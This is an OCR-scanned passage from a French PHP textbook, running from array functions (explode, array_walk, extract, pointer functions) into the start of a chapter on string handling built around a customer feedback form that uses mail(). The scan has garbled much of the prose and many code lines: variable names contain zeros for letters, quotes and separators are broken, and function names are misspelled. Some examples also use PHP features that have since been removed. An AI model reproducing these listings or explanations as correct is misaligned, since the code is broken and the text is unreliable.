<?php 

// Lecture du fichier complet. 

// Chaque commande devient un element du tableau 

$commandes = file( "$D0CUMENT_R00T/ .. /orders/orders. txt" ) ; 
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// Compte le nombre de commandes dans le tableau 
$nbre_de_cdes = count ($commandes) ; 

if ($nbre_de_cdes == 0) { 

echo "<p><strong>Aucune commande en attente. 
Reessayez plus tard.</strong></p>" ; 

} 

echo "<table border=\"1 \">\n" ; 

echo "<tr><th bgcolor=\ "#CCCCFF\ ">Date commande</th> 
<th bgcolor=\ "#CCCCFF\ ">Pneus</th> 
<th bgcolor=\ "#CCCCFF\ ">Huiles</th> 
<th bgcolor=\ "#CCCCFF\ ">Bougies</th> 
<th bgcolor=\ "#CCCCFF\ ">Total</th> 
<th bgcolor=\ "#CCCCFF\ ">Adresse</th> 
<tr>" ; 

for ($i = 0; $i < $nbre_de_cdes ; $i++) { 
// Decoupage de chaque ligne 
$ligne = explode( " \t" , $commandes[$i] ) ; 

// On ne conserve que le nombre d' articles commandes 
$ligne[1] = intval($ligne[1 ] ) ; 
$ligne[2] = intval($ligne[2] ) ; 
$ligne[3] = intval($ligne[3] ) ; 

// Affiche chaque commande 

echo "<tr> 

<td>" .$ligne[0] . "</td> 
<td align=\"right\">" .$ligne[1 ] . "</td> 
<td align=\"right\">" .$ligne[2] . "</td> 
<td align=\"right\">" .$ligne[3] . "</td> 
<td align=\"right\">" .$ligne[4] . "</td> 
<td>" .$ligne[5] . "</td> 
</tr>"; 

} 

echo "</table>"; 

?> 

</body> 
</html> 



Le code du Listing 3.3 charge l'integralite du fichier dans un tableau. Contrairement au 
Listing 3.2, c'est ici la fonction explode () qui est employee pour decouper chaque 
ligne avant les operations de traitement et de mise en forme avant affichage. 
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Le resultat obtenu a l'execution du Listing 3.3 est montre a la Figure 3.6. 

Le garage de Bob - Commandes clients 
Q | :•> (Jj) (X) CU / nltp://localhCj^T ) - (Bf Q ) (W) @* 

Le garage de Bob 



Commandes clients 



|Date commande 


Pneus 


Huiles |Bougies | Total | Adresse 


20:30, le 31-03 


4 


1 1 6 |434.00E |22 rue de la pompc, Paris 


20:42, le 31-03 


1 


1 1 1 00 .DDE 1 3 3 grande rac , Toulon se 


20:43, le 31-03 





1 1 4 1 26.00E |27 rue des acacias, Bordeaux 



Termine ^ 

Figure 3.6 

Apres le decoupage des lignes de commande avec explode(), les differentes sections de chaque 
commande sont placees dans des cellules separees d'un tableau, de facon a ameliorer la presentation 
des resultats. 

Voici le prototype de la fonction explode ( ) : 

array explode(string separateur, string chaine [, int limite]) 

Au cours du Chapitre 2, nous avons utilise le caractere de tabulation en guise de delimi- 
teur lors de l'enregistrement de ces donnees. C'est pourquoi l'appel de la fonction 
explode ( ) est ici realise de la maniere suivante : 

explode( "\t", $commandes[$i] ) 

Cette instruction a pour effet de decouper la chaine passee comme deuxieme parametre. 
Chaque caractere de tabulation devient une separation entre deux elements. Ainsi, la 
chaine : 

"15:42 le 20-04 4 pneus 1 bidons d'huiles 6 bougies 434. 00€ 22 rue noire, Toulouse" 
est decoupee en six parties, "15:42 le 20 04", "4 pneus", "1 bidons d'huiles", 
"6 bougies", "434. 00€" et "22 rue noire, Toulouse". 

Vous pouvez egalement utiliser le parametre facultatif limit pour limiter le nombre 
maximal de parties renvoyees. 

Dans le code du Listing 3.3, le traitement auquel sont soumises les donnees extraites du 
fichier des commandes est minimal. Nous nous contentons d'afficher les quantites de 
chaque article et d'ajouter au tableau une ligne d'en-tete indiquant la signification 
des nombres afnehes. 
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Nous aurions pu proceder de plusieurs autres manieres pour extraire les nombres conte- 
nus dans ces chaines. Dans le Listing 3.3, nous avons utilise la fonction intval( ) qui 
convertit une chaine en nombre entier. Cette conversion ne pose pas de probleme puis- 
que les parties qui ne peuvent pas etre converties en nombres entiers sont ignorees. 
Nous etudierons diverses autres methodes de traitement des chaines au cours du 
prochain chapitre. 

Autres manipulations de tableaux 

Nous n'avons vu jusqu'ici que la moitie environ des fonctions de traitement de tableaux 
offertes par PHP. La plupart des autres ne servent que de maniere occasionnelle. 

Parcours d'un tableau : each, current(), reset(), end(), next(), pos() et prev() 

Nous avons vu plus haut que chaque tableau comprend un pointeur interne dirige sur 
l'element courant du tableau. Nous avons deja fait usage de maniere indirecte de ce 
pointeur lorsque nous nous sommes servis de la fonction each ( ) , mais il est egalement 
possible de l'utiliser et de le manipuler directement. 

A la creation d'un nouveau tableau, le pointeur est initialise de sorte a pointer sur 
le premier element du tableau. C'est ainsi que l'appel de current ($tableau ) renvoie le 
premier element. 

Les fonctions next ( ) et each ( ) permettent de faire avancer ce pointeur d'un element. 
La fonction each($tableau) renvoie l'element courant avant de deplacer le pointeur. 
Le comportement de la fonction next ($tableau) est legerement different puisqu'elle 
fait avancer le pointeur puis renvoie le nouvel element courant. 

Comme nous 1' avons deja mentionne, la fonction reset ( ) fait revenir le pointeur sur 
le premier element d'un tableau. De la meme maniere, la fonction end ( ) le deplace sur le 
dernier element du tableau qui lui est fourni en parametre. Les fonctions reset ( ) et 
end() renvoient, quant a elles, respectivement le premier et le dernier element d'un 
tableau. 

Pour parcourir un tableau en sens inverse, vous pouvez employer les fonctions end ( ) et 
prev ( ) . La fonction prev ( ) est l'oppose de la fonction next ( ) : elle fait reculer le pointeur 
d'un element puis renvoie le nouvel element courant. 

Le code qui suit produit l'affichage d'un tableau dans l'ordre inverse : 

$valeur = end ($tableau); 
while ($valeur) { 

echo "$valeur<br />"; 

$valeur = prev ($tableau ) ; 

} 
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Si la variable $tableau a ete declaree de la maniere suivante : 

$tableau = array(1, 2, 3); 

le resultat de 1' execution du code precedent sera : 

3 
2 
1 

Avec les fonctions each ( ), current ( ), reset ( ), end ( ), next ( ) , pos ( ) et prev( ), vous 
pouvez done parcourir un tableau comme bon vous semble. 

Application d'une fonction donnee a chaque element d'un tableau : 
array_walk() 

II est parfois necessaire d'appliquer le meme traitement a tous les elements d'un 
tableau : e'est la que la fonction array walk( ) entre en jeu. 

Voici le prototype de la fonction array walk ( ) : 

bool array_walk( array tableau, string fonction, [mixed donnees_utilisateur]) 

Tout comme la fonction usort ( ) , array walk ( ) requiert comme second parametre une 
fonction definie par l'utilisateur. 

La fonction array walk( ) prend trois parametres. Le premier, tableau, est le tableau 
dont on veut traiter le contenu. Le second, fonction, est le nom de la fonction definie 
par l'utilisateur et qui sera appliquee a chaque element du tableau. Le troisieme para- 
metre, donnees utilisateur, est facultatif. S'il est present, il est passe en parametre a 
la fonction definie par l'utilisateur. Nous allons voir un peu plus loin un exemple de 
mise en ceuvre de la fonction array walk ( ) . 

II pourrait, par exemple, se reveler tres pratique d'attribuer a chaque element d'un 
tableau une fonction qui applique une mise en forme particuliere. 

Le code qui suit affiche chaque element du tableau $tableau sur une nouvelle ligne, en 
appliquant a chaque element la fonction mon af f ichage ( ) : 

function mon_aff ichage ($valeur) { 
echo "$valeur<br />"; 

} 

array_walk($tableau, ' mon_aff ichage ' ) ; 

La signature de la fonction personnalisee est particuliere. Pour chaque element du 
tableau traite, array walk prend la cle et la valeur enregistrees dans le tableau, ainsi 
que la valeur specifiee comme parametre donnees utilisateur, puis appelle la fonction 
personnalisee de la maniere suivante : 

fonctionUtilisateur {valeur, cle, donnees_utilisateur) 
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Dans la plupart des cas, le parametre donnees utilisateur est inutile ; il ne sert que 
lorsque la fonction que vous avez dermic exige un parametre. 

II peut egalement arriver que la cle de chaque element soit tout autant necessaire a la 
manipulation effectuee que la valeur de l'element. Mais, comme dans le cas de 
mon affichage(), votre fonction peut ignorer aussi bien la cle que le parametre 
donnees utilisateur. 

Considerons a present un exemple un peu plus complexe : nous allons ecrire une 
fonction qui modifie les valeurs d'un tableau et attend un parametre. Notez que, dans 
ce cas, nous devons indiquer la cle dans la liste des parametres afm de pouvoir speci- 
fier le troisieme, meme si nous n'avons pas besoin de cette cle dans le corps de la 
fonction : 

function ma_multiplication(&$valeur, $cle, $facteur){ 
$valeur *= $facteur; 

} 

array_walk(&$tableau, ' majnultiplication ' , 3); 

La fonction ma multiplication ( ) multiplie chaque element du tableau par le facteur 
passe en parametre. Nous devons utiliser le troisieme parametre (facultatif) de la fonc- 
tion array walk ( ) afm que celle-ci passe ce dernier comme parametre a notre fonction 
(laquelle s'en sert ensuite comme facteur de la multiplication). Pour que notre fonc- 
tion ma multiplication ( ) recupere ce facteur, il est imperatif de la definir avec trois 
arguments : une valeur d'element de tableau ($valeur), une cle d'element de tableau 
($cle) et le facteur de multiplication ($f acteur). Ici, la fonction ma multiplication ( ) 
ignore la cle qui lui est passee en second parametre. 

La maniere dont $valeur est passee a la fonction ma multiplication ( ) merite quel- 
ques explications. Lesperluette (&) placee avant le nom de la variable dans la definition 
de ma multiplication ( ) indique que $valeur doit etre passee par reference. Passer 
une variable par reference permet a la fonction de modifier le contenu de cette variable 
et done, ici, du tableau. 

Cette maniere de passer les variables aux fonctions est etudiee en detail au Chapi- 
tre 5. Si cette notion vous est etrangere, il vous suffit pour l'instant de savoir que, 
pour passer en parametre une variable par reference, il faut placer une esperluette 
devant son nom. 

Comptage des elements d'un tableau : 
countQ, sizeofQ et array_count_values() 

Dans un des exemples precedents, nous avons employe la fonction count () pour 
determiner le nombre des elements d'un tableau contenant les commandes des 
clients. La fonction sizeof () accomplit la meme tache que la fonction count (). 
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Toutes les deux renvoient le nombre d'elements du tableau qui leur est passe en parametres. 
Elles renvoient la valeur 1 lorsqu'elles sont appliquees a une variable scalaire et 
lorsqu'elles s'appliquent a un tableau vide ou a une variable non dermic 

La fonction array count values () est plus complexe : elle determine le nombre 
d' occurrences de chaque valeur unique dans le tableau qui lui est passe en parametre 
(c'est ce que Ton appelle la cardinality du tableau). Cette fonction renvoie un 
tableau associatif contenant une table des frequences. Ce tableau a pour cles toutes 
les valeurs uniques du tableau passe a array count values ( ) et chacune de ces cles 
est associee a une valeur numerique representant le nombre de ses occurrences dans 
le parametre. 

Le code suivant : 

$tableau = array(4, 5, 1, 2, 3, 1, 2, 1); 
$ac = array_count_values($tableau) ; 

cree un tableau Sac dont le contenu est le suivant : 

Cle Valeur 

4 1 

5 1 

1 3 

2 2 

3 1 

Dans ce cas precis, le tableau retourne par array count values () indique que le 
tableau $tableau contient une seule fois les valeurs 4, 5 et 3, trois fois la valeur 1, et 
deux fois la valeur 2. 

Conversion de tableaux en variables scalaires : extract() 

Vous pouvez transformer un tableau a indices non numeriques contenant des paires cle/ 
valeur en un ensemble de variables scalaires au moyen de la fonction extract (). 
Le prototype de la fonction extract ( ) est le suivant : 

extract(array tableau [, int type_extraction] [, string prefixe] ); 

La fonction extract () produit des variables scalaires a partir du tableau qui lui est 
passe en parametre. Elle utilise les cles pour definir les noms de ces variables et les 
valeurs des elements comme valeurs des variables. 
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Void un exemple simple d'utilisation de la fonction extract ( ) : 

$tableau = array( 'del' => 'valeurl', ' cle2 1 => 'valeur2', 'cle3' => 'valeur3'); 

extract($tableau) ; 

echo "$cle1 $cle2 $cle3"; 

L' execution de ce code produit le resultat suivant : 

valeuM valeur2 valeur3 

Le tableau $tableau contenant trois elements dont les cles sont clel, cle2 et cle3, la 
fonction extract ( ) appliquee a $tableau cree done les trois variables scalaires $cle1 , 
$cle2 et $cle3. Vous pouvez constater dans le resultat obtenu que les valeurs 
de $cle1 , $cle2 et $cle3 sont respectivement ' valeurl 1 , ' valeur2 ' et ' valeur3 ' , qui 
proviennent du tableau initial. 

La fonction extract () accepte deux arguments facultatifs : type extraction et 
prefixe. Le premier indique a extract ( ) la maniere dont doivent etre gerees les colli- 
sions, e'est-a-dire les situations ou il existe deja une variable de meme nom qu'une cle. 
Le comportement par defaut consiste a ecraser la variable existante. Le Tableau 3.2 
decrit les quatre valeurs autorisees pour type extraction . 



Tableau 3.2 : Valeurs possibles du parametre typejsxtraction de la fonction extractQ 



Type 






Signification 


EXTR 


OVERWRITE 


Ecrase la variable existante en cas de collision. 


EXTR 


SKIP 




Saute l'element en cas de collision. 


EXTR 


PREFIX 


SAME 


Cree une variable denommee $pref ixe cle en cas de collision. 
Le parametre prefixe doit alors etre precise. 


EXTR 


PREFIX 


ALL 


Prefixe tous les noms de variables avec la valeur indiquee dans 
le parametre prefixe, qui est alors obligatoire. 


EXTR 


PREFIX 


INVALID 


Prefixe avec la valeur de prefixe les noms de variables qui 
seraient sans cela invalides (par exemple les noms de variable 
numeriques). Vous devez fournir le prefixe. 


EXTR 


IF EXISTS 


N'extrait que les variables deja existantes (autrement dit, 
remplace les valeurs des variables existantes par les valeurs du 
tableau). Cette fonctionnalite permet, par exemple, de convertir 
$ REQUEST en un ensemble de variables valides. 


EXTR 


PREFIX 


IF EXISTS 


Ne cree une version prefixee que si la version non prefixee 
existe deja. 


EXTR 


REFS 




Extrait les variables sous forme de references. 
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Les deux valeurs les plus couramment utilisees pour l'argument type extraction sont 
la valeur par defaut (EXTR OVERWRITE) et EXTR PREFIX ALL. Les deux valeurs suivantes 
sont utiles de maniere occasionnelle, lorsqu'une collision particuliere est attendue et 
que vous voulez "sauter" ou pre fixer la cle posant probleme. Le fragment de code qui 
suit illustre l'utilisation de la valeur EXTR PREFIX ALL. Observez la maniere dont sont 
formes les noms des variables creees : prefixe_cle. 

$tableau = array( 'del' => 'valeuM', ' cle2 1 => 'valeur2', 'cle3' => 'valeur3'); 

extract ($tableau, EXTR_PREFIX_ALL, 'mon_pref ixe 1 ) ; 

echo "$mon_pref ixe_cle1 $mon_pref ixe_cle2 $mon_pref ixe_cle3" ; 

La encore, le resultat obtenu a l'execution des lignes de codes precedents est valeur 1 
valeur2 valeur3. 

Pour que la fonction extract () puisse extraire un element, il faut que la cle de 
1' element soit un nom de variable valide, ce qui signifie que les cles dont les noms 
commencent par des chiffres ou qui contiennent des espaces ne peuvent pas etre extraites. 

Pour aller plus loin 

Ce troisieme chapitre a presente les fonctions PHP de manipulation de tableau qui nous 
apparaissent les plus utiles. Certaines ne sont volontairement pas abordees. Vous trou- 
verez dans le manuel en ligne PHP (http://www.manuelphp.com/php/ref.array.php) 
une presentation exhaustive de toutes les fonctions PHP disponibles. 

Pour la suite 

Le Chapitre 4 traite des fonctions de manipulation des chaines. II couvre les fonctions 
de recherche, de remplacement, de scission et de fusion de chaines. II decrit egalement 
les puissantes fonctions de traitement des expressions regulieres qui permettent de 
realiser quasiment toutes les operations envisageables sur les chaines. 



4 



Manipulation de chaines 
et d 9 expressions regulieres 

Dans ce chapitre, nous verrons comment utiliser les fonctions PHP de traitement des 
chames pour mettre en forme et manipuler du texte. Nous examinerons egalement 
l'emploi des fonctions de traitement de chames et d' expressions regulieres pour rechercher 
et remplacer des mots, des phrases ou tout autre motif au sein d'une chaine. 

Les fonctions decrites dans ce chapitre sont utiles dans de nombreux contextes. Vous 
vous trouverez sans aucun doute souvent en situation de devoir nettoyer ou mettre en 
forme les donnees saisies par les utilisateurs avant de les enregistrer dans une base 
de donnees, par exemple. Par ailleurs, les fonctions de recherche sont precieuses lors de 
l'elaboration d' applications de type moteur de recherche (entre autres). 

Application modele : formulaire intelligent de saisie d'un message 
{Smart Form Mail) 

Nous illustrerons notre etude des fonctions de manipulation de chaines et d'expressions 
regulieres par le developpement d'un formulaire intelligent de saisie d'un message. 
Nous utiliserons les scripts dents au cours de ce chapitre pour completer 1' application 
du garage de Bob elaboree dans les chapitres precedents. 

Notre objectif est ici de developper un formulaire simple, que les clients de Bob pour- 
ront utiliser pour faire part de leurs reclamations et de leurs encouragements. Ce formu- 
laire (voir Figure 4. 1) est plus elabore que la plupart des formulaires de ce type publics 
sur le Web (et qui sont legion). En effet, au lieu de transmettre le formulaire vers une 
adresse de courrier electronique generique, telle que commentairesOchezbob . com, nous 
ferons appel a un processus plus intelligent qui consiste a rechercher des mots et des 
phrases cles dans ce qui a ete saisi par les clients, puis a transmettre le message du client 
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a l'employe approprie. Si, par exemple, le message transmis par le client contient le mot 
"publicite", il sera dirige vers la boite aux lettres du departement de marketing. Si le 
message emane d'un client important, il pourra etre directement transmis a Bob. 



Figure 4. 1 

Le formulaire de saisie 
d'un message du site de Bob 
permet aux clients de trans- 
mettre leurs commentaires, 
apres avoir saisi leur nom 
et leur adresse de courrier 
electronique. 



Le Garage de Bob - Commertaire des cl ie nts 

( + I )- (CD 00 CLT" "p-/;nfr O - ( EFq ) ® ©' 



Commentaire des clients 



Donnez-nous votre avis 

Voire nom : 

Votre adrcsse email : 
Vos commentaires : 



( Envoyer le commentaire ^ 



Nous commencerons ce projet par le script simple du Listing 4.1. Nous completerons 
ensuite ce script au fur et a mesure de notre avancee dans ce chapitre. 

Listing 4.1 : processfeedback.php — Script de base permettant la transmission 
du contenu d'un formulaire par courrier electronique 



<?php 

// Creation de noms abreges pour les variables 
$nom = $_POST[ ' nom ' ] ; 
$email = $_POST[ ' email '] ; 
$commentaire = $_POST[ 1 commentaire '] ; 

// Initialisation de quelques informations statiques 
$adresse_dest = "commentaires@exemple.com"; 
$sujet = "Message provenant du site web"; 
$contenu_message = "Nom client : " . $nom . "\n" . 

"Email client : ". $email . "\n". 
"Commentaires client :\n" . $commentaire . "\n" 
$adresse_exp = "From: webserveriaexemple.com"; 

// Appel de la fonction mail() pour envoyer le courrier 
mail($adresse_dest, $sujet, $contenu_message, $adresse_exp) ; 
?> 
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<html> 
<head> 

<title>Le garage de Bob -- Commentaire transmis</title> 
</head> 
<body> 

<h1 >Commentaire transmis</h1> 
<p>Votre commentaire a ete envoye.</p> 
</body> 
</html> 



Notez qu'en situation reelle il faudrait tester si l'utilisateur a bien rempli tous les 
champs obligatoires, par exemple en utilisant la fonction isset() avant d'appeler la 
fonction mail ( ) . Ce test a ete omis dans le Listing 4. 1 et dans les autres exemples par 
souci de simplification. 

Dans ce script, on concatene les champs du formulaire et on utilise la fonction mail( ) 
de PHP pour transmettre par courrier electronique la chame resultante a l'adresse 
commentaires@exemple . com. II s'agit bien sur d'une adresse e-mail d'exemple : si vous 
souhaitez tester le code de ce chapitre, remplacez-la par votre adresse e-mail. Comme 
c'est la premiere fois que nous utilisons la fonction mail ( ) , nous allons nous interesser 
a son fonctionnement. 

Comme son nom le suggere, la fonction mail ( ) transmet des courriers electroniques 
(des e-mails). Voici son prototype : 

bool mail(string A, string Objet, string Message, 
string [entetes_additionnels]) ; 

Les trois premiers arguments de la fonction mail ( ) sont obligatoires et represented 
respectivement l'adresse a laquelle doivent etre envoyes le message, l'objet et le 
contenu du message. Le quatrieme parametre permet d'envoyer n'importe quel en-tete 
supplementaire valide de courrier electronique. Vous trouverez une description des en- 
tetes e-mails valides dans le document RFC822 qui peut etre consulte en ligne (nombre 
de standards Internet sont definis dans des RFC, Request For Comments, que nous 
presenterons au Chapitre 18). Ici, le quatrieme parametre que nous passons a la fonc- 
tion mail ( ) sert a ajouter un champ "From : " (l'adresse de provenance) dans le courrier. 
Nous aurions egalement pu l'employer pour inserer des champs "Reply To : " et "Cc : ", 
entre autres. Pour ajouter plusieurs en-tetes additionnels, il suffit de les indiquer a la 
suite sous forme d'une chaine, en les separant par des caracteres de nouvelle ligne et de 
retour chariot (\n\r), comme ici : 

$entetes_additionnels ="From: webserver@exemple . com\ r\n " 

"Reply-To: bob@exemple.com"; 

Vous pouvez vous servir du cinquieme parametre facultatif pour passer un parametre au 
programme que vous avez configure pour l'envoi d'e-mails. 
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Pour pouvoir mettre en ceuvre la fonction mail ( ) , vous devez configurer votre installa- 
tion PHP pour lui indiquer l'existence de votre programme d'envoi des courriers. Si 
1' execution de votre script pose probleme, relisez attentivement 1' Annexe A et verifiez 
votre installation PHP 

Tout au long de ce chapitre, nous ameliorerons le script de base du Listing 4.1 en nous 
servant de fonctions PHP de manipulation des chaines et d'expressions regulieres. 

Mise en forme de chaines 

Les chaines saisies par les visiteurs des sites web (generalement a partir d'un formu- 
laire HTML) necessitent souvent d'etre nettoyees pour etre exploitables. Les sections 
qui suivent presentent certaines des fonctions permettant d'effectuer cette operation. 

Elagage des chaines : chop(), ltrim() et trim() 

La premiere etape dans le nettoyage d'une chaine consiste souvent a en eliminer tout 
espace superflu. Cet elagage n'est pas indispensable, mais se revele souvent tres utile 
lorsque les chaines doivent etre enregistrees dans un fichier ou dans une base de 
donnees ou lorsqu'elles doivent etre comparees avec d'autres chaines. 

Le langage PHP offre trois fonctions permettant d'effectuer ce type de nettoyage. Dans 
le cadre de notre application modele, nous utiliserons la fonction trim( ) pour elaguer 
les donnees entrantes au moment ou Ton cree les noms abreges : 

$nom = trim($_P0ST[ 'nom' ] ) ; 
$email = trim($_P0ST[ ' email 1 ]) ; 
$commentaire = trim($_POST[ 1 commentaire ' ] ) ; 

La fonction trim( ) elimine les espaces existant en debut et a la fin de la chaine qui lui 
est fournie en parametre et retourne la chaine ainsi elaguee. Les caracteres d'espace 
supprimes par la fonction t rim ( ) sont les nouvelles lignes et les retours chariot ( \ n, \ r), 
les tabulations horizontales et verticales (\t et \ v), les caracteres de fin de chaine (\0) et 
les caracteres espaces. Vous pouvez egalement passer a cette fonction un second para- 
metre contenant une liste des caracteres a supprimer a la place de cette liste par defaut. 

Selon le but recherche, les fonctions It rim ( ) ou rtrim ( ) peuvent se reveler plus appro- 
priees que la fonction trim(). Comme la fonction trim(), elles prennent toutes les 
deux la chaine a traiter en parametre et renvoient cette chaine mise en forme. En 
revanche, alors que la fonction trim() supprime tous les espaces qui encadrent la 
chaine, la fonction ltrim() elimine uniquement les espaces en debut de chaine 
(c'est-a-dire a la gauche de la chaine) tandis que la fonction rtrim () les supprime 
uniquement a la fin de la chaine (c'est-a-dire a droite). 
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Mise en forme des chaines en vue de leur presentation 

PHP offre tout un jeu de fonctions dediees a la mise en forme des chaines. 

Utilisation du format HTML : la fonction nI2br() 

La fonction nl2br( ) remplace chaque caractere de nouvelle ligne de la chaine qui lui 
est passee en parametre par la balise <br />. Cette fonction est precieuse lorsque de 
longues chaines doivent etre affichees dans la fenetre du navigateur. Par exemple, nous 
utiliserons la fonction nl2br() pour presenter en retour au client le message qu'il a 
transmis sous une forme acceptable : 

<p>Votre commentaire (voir ci-apres) a ete envoye.</p> 
<p><?php echo nl2br($contenu_message) ; ?> </p> 

Souvenez-vous que, dans le contexte d'un codage HTML, l'espace est ignoree. Par 
consequent, en l'absence d'un traitement par nl2br(), le message du client sera 
imprime sous la forme d'une seule ligne (a l'exception des caracteres de nouvelles 
lignes imposes par le navigateur lui-meme). La Figure 4.2 illustre ces deux modes 
d'affichage, avec et sans traitement par n!2br ( ). 



Le garage de Bob — Commentaire transmis 

(«\» > (e) @ (J^ "'tp://'°"'h'-fr T ) - (El5) ® @ T 
Commentaire transmis 

Votrc comincntairc a 6l6 cnvoyc . 

Sans nl2br() 

Nom client : Eric Jacoboni Email client : jaco@chczmoi.org Commcntaircs client : 
Mcrci dc nous permcttrc dA'cnvoycr des commcntaircs ! 

Avec nl2br() 

Nom client : Eric Jacoboni 
Email client : jaco@chezmoi.org 
Commcntaircs client : 

Mcrci dc nous permcttrc dVenvoyer des commcntaires ! 



Termine ^ 

Mise en forme d'une chaine pour I'afficher 

Jusqu'ici, nous avons utilise la construction echo de PHP pour afficher des chaines dans 
la fenetre du navigateur web. 



tigure 4.z 

La fonction PHP nl2br() 
permet d'ameliorer la 
presentation des longues 
chaines dans du code 
HTML 
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PHP offre egalement la fonction print ( ) , qui est analogue a la construction echo, sauf 
qu'elle renvoie une valeur (vrai ou faux, selon la reussite ou l'echec de l'affichage). 

echo, tout comme print ( ) , affiche la chaine "telle quelle". Vous pouvez toutefois appli- 
quer une mise en forme plus sophistiquee au moyen des fonctions printf() et 
sprintf(). Toutes les deux operent pratiquement de la meme maniere, sauf que 
printf () affiche la chame mise en forme dans le navigateur, tandis que sprintf () 
renvoie cette chaine mise en forme. 

Ces fonctions ont le meme comportement que leurs equivalents dans le langage C, bien 
que leur syntaxe ne soit pas la meme. Si vous n'avez jamais programme en C, il vous 
faudra peut-etre un peu de temps pour vous familiariser avec ces fonctions, mais le jeu 
en vaut toutefois la chandelle, compte tenu de leur puissance et de leur utilite. 

Les prototypes de ces fonctions sont les suivants : 

string sprintf (string format [, mixed parametres . . .]) 
int printf (string format [, mixed parametres...]) 

Le premier parametre requis par ces fonctions est une chame de format decrivant la 
forme de base de la sortie, avec des codes de mise en forme au lieu de variables. Les 
autres parametres sont des variables que PHP viendra inserer dans la chaine, en lieu et 
place des codes de mise en forme. 

Par exemple, avec la fonction echo, nous pouvons afficher une chaine en y inserant une 
variable, comme suit : 

echo "Le montant total de la commande est $total."; 

Le meme resultat peut etre obtenu au moyen de la fonction printf ( ), de la maniere 
suivante : 

printf ("Le montant total de la commande est %s.", $total); 

Le code %s dans la chaine de format est une "specification de conversion". II indique a 
PHP qu'il doit etre remplace par une chaine. Dans le cas present, il doit etre remplace 
par la variable $total qui doit etre interpreted comme une chaine. 

Si la valeur stockee dans $total est 12,4, ces deux approches conduiraient a l'affichage 
de $total sous la forme 12,4. 

L'interet de la fonction printf () est qu'elle permet d'utiliser une specification de 
conversion plus utile. En effet, nous pouvons utiliser printf ( ) en precisant que $total 
est, en realite, un nombre a virgule flottante et que sa valeur doit etre affichee avec deux 
decimales, comme ceci : 

printf ("Le montant total de la commande est %.2f", $total); 

Avec ce formatage et la valeur 12.4 stockee dans $total, l'instruction affichera 1 2 . 40. 
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Une chaine de format peut comprendre plusieurs specifications de conversion. Si vous 
avez n specifications, il doit normalement y avoir n arguments apres la chaine de 
format. Chaque specification de conversion sera remplacee par l' argument reformate 
correspondant, dans l'ordre ou ils sont indiques. Par exemple : 

printf ("Montant total : %.2f (dont %.2f de transport)", 
$total, $total_transport) ; 

Dans le cas present, la premiere specification de conversion utilisera la valeur de 
$total et la seconde specification se servira de la valeur de $total transport. 

Chaque specification de conversion se conforme au format suivant : 

%[ ' caractere_remplissage] [-] [largeur] [ .precision] type 

Toutes les specifications de conversion commencent par le symbole %. Pour afficher un 
symbole %, vous devrez par consequent utiliser %%. 

Le specificateur caractere remplissage est facultatif. S'il est precise, il sert a 
completer la variable jusqu'a la largeur specifiee. Par exemple, un caractere de remplis- 
sage s'utilise pour ajouter des zeros au debut de nombres comme les compteurs. Le 
caractere de remplissage par defaut est une espace. Si vous specifiez une espace ou 
zero, vous n'avez pas besoin de le prefixer avec l'apostrophe ('). Tous les autres carac- 
teres de remplissage doivent etre prefixes par une apostrophe. 

Le symbole est facultatif. II indique que les donnees doivent etre justinees a gauche, 
au lieu de l'etre a droite, comme c'est le cas par defaut. 

Le specificateur largeur indique a la fonction printf ( ) l'espace (en nombre de carac- 
teres) a reserver pour la variable. 

Le specificateur precision commence normalement par un point decimal. II indique le 
nombre de decimales a afficher. 

Le type constitue la derniere partie d'une specification de conversion ; il indique le type 
des donnees passees en parametre. Les valeurs possibles pour ce specificateur sont 
presentees dans le Tableau 4. 1 . 

Tableau 4.1 : Valeurs possibles pour le type d'une specification de conversion 

Type Signification 

b L' argument est traite comme un entier et affiche comme un nombre binaire. 

c L' argument est traite comme un entier et affiche comme un caractere. 

d L' argument est traite comme un entier et affiche comme un nombre decimal. 
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Tableau 4.1 : Valeurs possibles pour le type d'une specification de conversion (suite) 



Type Signification 

f L' argument est traite comme un double et affiche comme un nombre a virgule 

flottante. 

o L' argument est traite comme un entier et affiche comme un nombre octal, 

s L' argument est traite et affiche comme une chaine. 

u L' argument est traite comme un entier et affiche comme un nombre decimal non 

signe. 

x L' argument est traite comme un entier et affiche comme un nombre hexadecimal 

(en minuscules s'il s'agit d'une lettre). 

X L' argument est traite comme un entier et affiche comme un nombre hexadecimal 

(en majuscules s'il s'agit d'une lettre). 



II est possible de numeroter les parametres, ce qui permet de passer les parametres dans 
un autre ordre que les specifications de conversion. Par exemple : 

printf ("Montant total : %2\$.2f (dont %1\$.2f de transport)", 
$total_transport , $total); 

II suffit d'ajouter la position du parametre dans la liste directement apres le signe %, 
suivi d'un symbole $ protege par un antislash ; dans le cas present, 2\$ signifie done 
"remplacer par le deuxieme parametre de la liste". Ce precede peut aussi etre utilise 
pour repeter des parametres. 

II existe deux versions alternatives de ces fonctions, appelees vprintf() et 
vsprintf(). Ces variantes acceptent deux parametres: la chaine de format et un 
tableau des parametres au lieu d'un nombre variable de parametres. 

Modification de la casse d'une chaine 

PHP offre la possibilite de modifier la casse d'une chaine. Dans le cas de 1' application 
modele etudiee dans ce chapitre, cette possibilite n'est guere utile, mais nous examine- 
rons neanmoins quelques exemples simples ou elle est tres appreciable. 

Considerons pour commencer la chaine $sujet qui contient l'objet d'un message. 
Diverses fonctions sont a notre disposition pour en changer la casse. Les effets de ces 
differentes fonctions sont resumes dans le Tableau 4.2. 

La premiere colonne indique le nom de la fonction, la deuxieme decrit l'effet de la 
fonction considered, la troisieme montre comment la fonction serait appliquee a 
la chaine $su j et, tandis que la derniere colonne donne la valeur qui serait renvoyee 
par la fonction. 
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Tableau 4.2 : Fonctions de modification de la casse d'une chaine, avec leurs effets 



Fonction Description 



strtoupper() Convertit la chaine en 
majuscules. 

strtolower ( ) Convertit la chaine en 
minuscules. 



Usage 
$su j et 



Valeur retournee 

Commentaire du site 
web 



strtoupper($sujet) COMMENTAIRE 
DU SITE WEB 

strtolower($sujet) commentaire du site 
web 



ucfirst() Met en majuscule la premiere ucf irst($sujet) 
lettre de la chaine, si ce 
caractere est alphabetique. 

ucwords() Met en majuscule la premiere ucwords($sujet) 
lettre de chaque mot de la chaine 
qui commence par un caractere 
alphabetique. 



Commentaire du site 
web 

Commentaire Du 
Site Web 



Mise en forme de chaines en vue de leur enregistrement : 
addslashesO et stripslashesQ 

Si les fonctions de traitement de chame permettent de modifier la presentation visuelle 
des chaines, certaines d'entre elles peuvent egalement etre employees pour reformater 
des chames dans la perspective de leur enregistrement dans une base de donnees. Bien 
que 1' denture dans une base de donnees ne soit pas abordee dans cet ouvrage avant la 
